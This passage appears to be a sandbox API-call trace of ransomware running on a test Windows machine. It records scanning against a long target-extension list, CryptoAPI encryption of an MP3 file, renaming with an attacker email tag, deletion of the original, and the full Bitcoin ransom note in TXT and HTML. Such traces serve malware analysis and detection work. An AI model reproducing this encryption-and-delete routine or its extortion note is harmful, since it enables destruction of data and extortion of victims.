	[0192.709] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e8459b0, ftCreationTime.dwHighDateTime=0x1d96fc4, ftLastAccessTime.dwLowDateTime=0x13c94040, ftLastAccessTime.dwHighDateTime=0x1d97575, ftLastWriteTime.dwLowDateTime=0x13c94040, ftLastWriteTime.dwHighDateTime=0x1d97575, nFileSizeHigh=0x0, nFileSizeLow=0x13da1, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZuujV6oG4LF3PG.mp3", cAlternateFileName="ZUUJV6~1.MP3")) returned 1
	[0192.709] lstrcmpW (lpString1="ZuujV6oG4LF3PG.mp3", lpString2="..") returned 1
	[0192.709] lstrcmpW (lpString1="ZuujV6oG4LF3PG.mp3", lpString2=".") returned 1
	[0192.709] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\"
	[0192.709] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\", lpString2="ZuujV6oG4LF3PG.mp3" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\ZuujV6oG4LF3PG.mp3") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\ZuujV6oG4LF3PG.mp3"
	[0192.709] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\ZuujV6oG4LF3PG.mp3") returned 63
	[0192.709] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0192.710] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\ZuujV6oG4LF3PG.mp3", cchLength=0x3f | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\zuujv6og4lf3pg.mp3") returned 0x3f
	[0192.710] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.710] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\zuujv6og4lf3pg.mp3", lpSrch="help_decrypt_your_files") returned 0x0
	[0192.710] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\zuujv6og4lf3pg.mp3" | out: lpString1="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\zuujv6og4lf3pg.mp3") returned="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\zuujv6og4lf3pg.mp3"
	[0192.710] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\zuujv6og4lf3pg.mp3") returned 63
	[0192.710] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0192.710] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.711] StrStrW (lpFirst=".mp3", lpSrch=".") returned=".mp3"
	[0192.711] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.711] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".mp3") returned=".mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0192.711] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0192.711] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0192.711] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\zuujv6og4lf3pg.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\zuujv6og4lf3pg.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0192.716] ReadFile (in: hFile=0x2c0, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x13da1, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x13da1, lpOverlapped=0x0) returned 1
	[0192.719] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.720] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb330) returned 1
	[0192.723] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.724] CryptCreateHash (in: hProv=0xfcb330, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0192.724] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.724] CryptHashData (hHash=0xfb9830, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0192.724] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.724] CryptDeriveKey (in: hProv=0xfcb330, Algid=0x6610, hBaseData=0xfb9830, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb9670) returned 1
	[0192.724] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.725] CryptEncrypt (in: hKey=0xfb9670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x13da1, dwBufLen=0x13da1 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x13db0) returned 1
	[0192.727] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0192.727] RtlMoveMemory (in: Destination=0xff0f30, Source=0xfdd180, Length=0x13da1 | out: Destination=0xff0f30) 
	[0192.727] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.727] CryptEncrypt (in: hKey=0xfb9670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff0f30*, pdwDataLen=0x18aefc*=0x13da1, dwBufLen=0x13db0 | out: pbData=0xff0f30*, pdwDataLen=0x18aefc*=0x13db0) returned 1
	[0192.728] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.728] CryptDestroyKey (hKey=0xfb9670) returned 1
	[0192.728] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.728] CryptDestroyHash (hHash=0xfb9830) returned 1
	[0192.728] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.728] CryptReleaseContext (hProv=0xfcb330, dwFlags=0x0) returned 1
	[0192.729] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0192.729] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0192.729] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.729] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0192.730] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\zuujv6og4lf3pg.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 105
	[0192.731] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\zuujv6og4lf3pg.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\zuujv6og4lf3pg.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0192.731] WriteFile (in: hFile=0x388, lpBuffer=0xff0f30*, nNumberOfBytesToWrite=0x13db0, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xff0f30*, lpNumberOfBytesWritten=0x18b358*=0x13db0, lpOverlapped=0x0) returned 1
	[0192.774] CloseHandle (hObject=0x388) returned 1
	[0192.775] CloseHandle (hObject=0x2c0) returned 1
	[0192.775] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\zuujv6og4lf3pg.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\zuujv6og4lf3pg.mp3")) returned 1
	[0192.783] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\zuujv6og4lf3pg.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\zuujv6og4lf3pg.mp3")) returned 0
	[0192.785] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e8459b0, ftCreationTime.dwHighDateTime=0x1d96fc4, ftLastAccessTime.dwLowDateTime=0x13c94040, ftLastAccessTime.dwHighDateTime=0x1d97575, ftLastWriteTime.dwLowDateTime=0x13c94040, ftLastWriteTime.dwHighDateTime=0x1d97575, nFileSizeHigh=0x0, nFileSizeLow=0x13da1, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZuujV6oG4LF3PG.mp3", cAlternateFileName="ZUUJV6~1.MP3")) returned 0
	[0192.785] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0192.785] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0192.786] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv"
	[0192.786] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\*.*"
	[0192.786] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0192.786] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0192.786] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\HELP_DECRYPT_YOUR_FILES.TXT") returned 72
	[0192.786] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0192.787] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0192.787] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0192.790] CloseHandle (hObject=0x384) returned 1
	[0192.790] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0192.791] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.791] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0192.792] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0192.792] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0192.793] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0192.793] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0192.793] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0192.793] CloseHandle (hObject=0x384) returned 1
	[0192.793] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0192.794] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0192.794] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0192.794] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\HELP_DECRYPT_YOUR_FILES.HTML") returned 73
	[0192.794] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0192.795] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0192.795] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0192.798] CloseHandle (hObject=0x384) returned 1
	[0192.798] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0192.799] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0192.800] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.800] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0192.802] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0192.802] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0192.802] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0192.802] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
